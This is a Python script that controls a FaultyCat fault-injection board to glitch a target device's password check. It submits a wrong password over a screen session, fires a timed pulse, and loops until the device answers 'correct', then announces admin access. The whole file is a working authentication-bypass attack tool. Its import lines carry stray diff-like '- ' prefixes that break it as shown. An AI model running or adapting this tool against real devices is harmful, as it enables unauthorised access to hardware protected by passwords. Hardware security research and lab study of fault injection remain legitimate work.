- import sys
- import time
- import pexpect # Required to handle screen sessions
- import threading
- from Modules import Worker
-
# Default serial port handed to the FaultyCat worker.
DEFAULT_COMPORT = "/dev/ttyACM0"
# Name of the screen session to attach to; change it to match the real session.
SCREEN_NAME = "ttyUSB0_screen"

# Worker object through which the board is configured and driven.
faulty_worker = Worker.FaultyWorker()
# Last verdict recorded by read_screen_output(); None until one is seen.
device_response = None
# pexpect process attached to the screen session; set by initialize_child().
child = None
-
def initialize_child():
    """Attach to the screen session and store the process in the global ``child``.

    Spawns ``screen -x SCREEN_NAME`` through pexpect with UTF-8 decoding, then
    waits one second for output so that whatever the session prints on attach
    is out of the way before the first command is sent.

    Raises:
        pexpect.EOF: If the ``screen`` process ends during that first second
            (presumably because no session named ``SCREEN_NAME`` exists). The
            message carries whatever screen printed before exiting.
    """
    global child
    # Pass the arguments as a list so the session name always reaches screen
    # as one argument, whatever characters it contains.
    child = pexpect.spawn('screen', ['-x', SCREEN_NAME], encoding='utf-8')

    # Matching on TIMEOUT is the normal outcome here; EOF is listed too so an
    # immediate exit of screen is reported with a useful message.
    outcome = child.expect([pexpect.TIMEOUT, pexpect.EOF], timeout=1)
    if outcome == 1:
        detail = (child.before or "").strip()
        raise pexpect.EOF(
            f"Could not attach to screen session '{SCREEN_NAME}': {detail}"
        )
-
def send_test_message_and_read_response():
    """Send 'ping' through the screen session and report whether 'pong' came back.

    Progress messages are written to stdout, each starting with a carriage
    return.

    Returns:
        bool: True when the text read back contains 'pong'; False when
        something else was read or nothing arrived within the read timeout.
    """
    child.sendline("ping")
    sys.stdout.write("\rSent 'ping' to screen session.")
    sys.stdout.flush()

    # Give the command time to be processed before reading.
    time.sleep(0.5)

    # Only the read itself can time out, so only it sits inside the try.
    try:
        response = child.read_nonblocking(size=1024, timeout=2)
    except pexpect.exceptions.TIMEOUT:
        sys.stdout.write("\rNo response received from the screen session (timeout).")
        sys.stdout.flush()
        return False

    got_pong = "pong" in response
    if got_pong:
        sys.stdout.write("\rReceived 'pong' response.")
    else:
        sys.stdout.write(f"\rReceived unexpected response: {response}")
    # Flush on both outcomes so the success message is not left in the buffer.
    sys.stdout.flush()
    return got_pong
-
def read_screen_output():
    """Read screen-session output line by line and act on the device's verdict.

    The global ``device_response`` is reset to None first, then output is read
    until one of the following happens:

    * a line contains 'incorrect!': ``device_response`` becomes 'incorrect'
      and the function returns;
    * a line contains 'correct' outside of the word 'incorrect':
      ``device_response`` becomes 'correct', a success banner is printed, the
      board is disarmed, its UART is closed and the whole process is
      terminated with status 0;
    * no data arrives within the 2 second read timeout, or another exception
      is raised: a message is printed and the function returns.

    Any other complete line is reported as unexpected and reading continues.
    """
    global device_response
    import os  # local import: only needed for the hard exit below

    # Never report a verdict left over from an earlier call.
    device_response = None
    pending = ""  # text received so far that has not yet formed a full line

    try:
        while True:
            pending += child.read_nonblocking(size=1024, timeout=2)

            # Handle every complete line currently in the buffer.
            while "\n" in pending:
                line, pending = pending.split("\n", 1)
                line = line.strip()

                if "incorrect!" in line:
                    device_response = 'incorrect'
                    return

                # 'correct' is a substring of 'incorrect', so remove every
                # 'incorrect' before looking for it; otherwise an echoed
                # 'incorrectPassword' or a reply without the '!' would be
                # mistaken for success.
                if "correct" in line.replace("incorrect", ""):
                    device_response = 'correct'
                    sys.stdout.write("\nReceived 'correct' response.\n PWNT, U R ADMIN\n Disarming the device and exiting...\n")
                    sys.stdout.flush()

                    # Disarm the board before the process goes away.
                    faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
                    faulty_worker.board_uart.close()

                    # sys.exit() only raises SystemExit in the calling thread,
                    # so from a worker thread the program would keep running
                    # with a closed UART. os._exit() ends the process itself;
                    # it skips normal cleanup, hence the explicit flushes.
                    sys.stdout.flush()
                    sys.stderr.flush()
                    os._exit(0)

                sys.stdout.write(f"\rReceived unexpected response: {line}")
                sys.stdout.flush()

    except pexpect.exceptions.TIMEOUT:
        sys.stdout.write("\rNo response received from the screen session (timeout).")
        sys.stdout.flush()
    except Exception as e:
        sys.stdout.write(f"\rError reading from screen session: {e}")
        sys.stdout.flush()
-
def send_pulse_and_check_response():
    """Submit a wrong password, fire one pulse and report the device's verdict.

    Sends 'incorrectPassword' through the screen session, waits 0.35 s, sends
    the pulse command to the board, then runs ``read_screen_output`` in a
    thread and waits for it to finish.

    Returns:
        bool: True when the global ``device_response`` is 'correct' after the
        reader has finished; False otherwise, including when an exception was
        caught and reported.
    """
    global device_response
    try:
        # Forget the verdict of any earlier attempt so it cannot be mistaken
        # for the outcome of this one.
        device_response = None

        sys.stdout.write("\rSending 'incorrectPassword' to screen session.")
        sys.stdout.flush()
        child.sendline("incorrectPassword")

        # Delay between submitting the password and firing the pulse
        # (presumably tuned to the target's timing; verify on hardware).
        time.sleep(0.35)

        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_PULSE.value.encode("utf-8"))
        sys.stdout.write("\rSent pulse...")
        sys.stdout.flush()

        # Read the screen output in a thread and wait until it has finished.
        reader_thread = threading.Thread(target=read_screen_output)
        reader_thread.start()
        reader_thread.join()

    except Exception as e:
        sys.stdout.write(f"\rError interacting with screen session during pulse: {e}")
        sys.stdout.flush()
        return False

    # Always hand the caller a real bool instead of an implicit None.
    return device_response == 'correct'
-
def start_faulty_attack():
    """Arm the board, run the ping/pulse attempts and always disarm afterwards.

    Steps:
      1. attach to the screen session (``initialize_child``) and open the
         board UART;
      2. send DISARM, wait one second, then send ARM;
      3. run up to 5 rounds: ping the target and, when it answers, make up to
         3 pulse attempts, stopping those early if one reports success; wait
         one second between rounds;
      4. send DISARM, close the board UART and close the screen child process.

    Errors derived from ``Exception`` are printed instead of propagated.
    Step 4 lives in a ``finally`` block, so once the UART has been opened the
    board is disarmed even when a round fails or the run is interrupted.
    """
    global child
    board_open = False  # becomes True once the UART is open and must be released
    try:
        initialize_child()

        faulty_worker.board_uart.open()
        board_open = True
        time.sleep(0.1)
        sys.stdout.write("\rBoard connected.\n")
        sys.stdout.flush()

        sys.stdout.write("\r[*] ARMING BOARD, BE CAREFUL!\n")
        sys.stdout.flush()
        # A DISARM is sent ahead of the ARM command, with a pause in between.
        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
        time.sleep(1)
        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_ARM.value.encode("utf-8"))

        sys.stdout.write("\r[*] ARMED BOARD.\n")
        sys.stdout.flush()
        time.sleep(1)

        max_iterations = 5
        pulse_attempts = 3
        for i in range(max_iterations):
            sys.stdout.write(f"\rLoop {i+1}/{max_iterations}: Sending pulse and checking response.\n")
            sys.stdout.flush()

            # Only pulse when the target answers the ping.
            if send_test_message_and_read_response():
                for _ in range(pulse_attempts):
                    if send_pulse_and_check_response():
                        break  # success reported; no further pulses this round

            # Small delay before the next round.
            time.sleep(1)
    except Exception as e:
        sys.stdout.write(f"\rError: {e}\n")
        sys.stdout.flush()
    finally:
        if board_open:
            # Never leave the board armed, whatever happened above.
            try:
                sys.stdout.write("\rDISARMING BOARD. \n")
                sys.stdout.flush()
                faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
                faulty_worker.board_uart.close()
                sys.stdout.write("\rBOARD DISARMED.\n")
                sys.stdout.flush()
            except Exception as e:
                sys.stdout.write(f"\rError: {e}\n")
                sys.stdout.flush()
        # Release the screen child process last.
        if child:
            child.close()
-
def faulty():
    """Point the worker at the default serial port and launch the attack.

    Prints the port in use, hands it to ``faulty_worker`` and validates the
    serial connection. The attack is started only when validation succeeds;
    otherwise an error message is printed and nothing else happens.
    """
    comport = DEFAULT_COMPORT

    print("Configuring the FaultyCat...")
    print(f"Using serial port: {comport}")

    faulty_worker.set_serial_port(comport)

    if faulty_worker.validate_serial_connection():
        # Connection is usable: run the pulse sequence.
        start_faulty_attack()
    else:
        print(f"Error: Could not establish connection on: {comport}")
-
if __name__ == "__main__":
    # Run only when executed as a script: announce start-up, then configure
    # the board and launch the attack.
    print("Starting FaultyCat...")
    faulty()